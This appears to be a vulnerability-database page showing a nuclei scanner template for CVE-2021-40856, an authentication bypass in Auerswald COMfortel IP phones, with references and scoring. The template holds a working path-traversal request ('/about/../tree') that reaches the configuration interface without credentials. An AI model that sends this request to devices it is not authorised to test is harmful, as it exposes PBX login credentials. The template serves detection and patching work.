Lucene search
K

Auerswald COMfortel 1400/2600/3600 IP - Authentication Bypass

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 29 Views

Auerswald COMfortel IP - Authentication Bypass CVE-2021-4085

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
Auerswald COMfortel 2.8F - Authentication Bypass Vulnerability
6 Dec 202100:00
zdt
ATTACKERKB
CVE-2021-40856
13 Dec 202104:15
attackerkb
Circl
CVE-2021-40856
13 Dec 202107:13
circl
CNNVD
Auerswald COMfortel 1400和2600 IP 授权问题漏洞
6 Dec 202100:00
cnnvd
CVE
CVE-2021-40856
13 Dec 202103:20
cve
Cvelist
CVE-2021-40856
13 Dec 202103:20
cvelist
Exploit DB
Auerswald COMfortel 2.8F - Authentication Bypass
6 Dec 202100:00
exploitdb
NVD
CVE-2021-40856
13 Dec 202104:15
nvd
OSV
CVE-2021-40856
13 Dec 202104:15
osv
Packet Storm
Auerswald COMfortel 1400/2600/3600 IP 2.8F Authentication Bypass
6 Dec 202100:00
packetstorm
Rows per page
id: CVE-2021-40856

info:
  name: Auerswald COMfortel 1400/2600/3600 IP - Authentication Bypass
  author: gy741
  severity: high
  description: Auerswald COMfortel 1400/2600/3600 IP is susceptible to an authentication bypass vulnerability. Inserting the prefix "/about/../" allows bypassing the authentication check for the web-based configuration management interface. This enables attackers to gain access to the login credentials used for authentication at the PBX, among other data.
  impact: |
    An attacker can bypass authentication and gain unauthorized access to the device.
  remediation: |
    Apply the latest firmware update provided by Auerswald to fix the authentication bypass vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-40856
    - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-004/-auerswald-comfortel-1400-2600-3600-ip-authentication-bypass
    - https://www.redteam-pentesting.de/en/advisories/-advisories-publicised-vulnerability-analyses
    - http://packetstormsecurity.com/files/165162/Auerswald-COMfortel-1400-2600-3600-IP-2.8F-Authentication-Bypass.html
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-40856
    cwe-id: CWE-706
    epss-score: 0.5106
    epss-percentile: 0.98799
    cpe: cpe:2.3:o:auerswald:comfortel_3600_ip_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: auerswald
    product: comfortel_3600_ip_firmware
  tags: cve2021,cve,packetstorm,comfortel,auth-bypass,auerswald,vkev,vuln

http:
  - raw:
      - |
        GET /about/../tree?action=get HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"TYPE"'
          - '"ITEMS"'
          - '"COUNT"'
        condition: and

      - type: word
        part: header
        words:
          - application/json

      - type: status
        status:
          - 200
# digest: 4a0a00473045022055abe1254f7c94211db644a5fd1130d110bd1237c7dd930f021cf9cadb0e694d02210081713669c007d76b48c864dc8183e460453afcdd882bf4bb9e1aa68890b87b4c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 25
CVSS 3.17.5
EPSS0.5106
29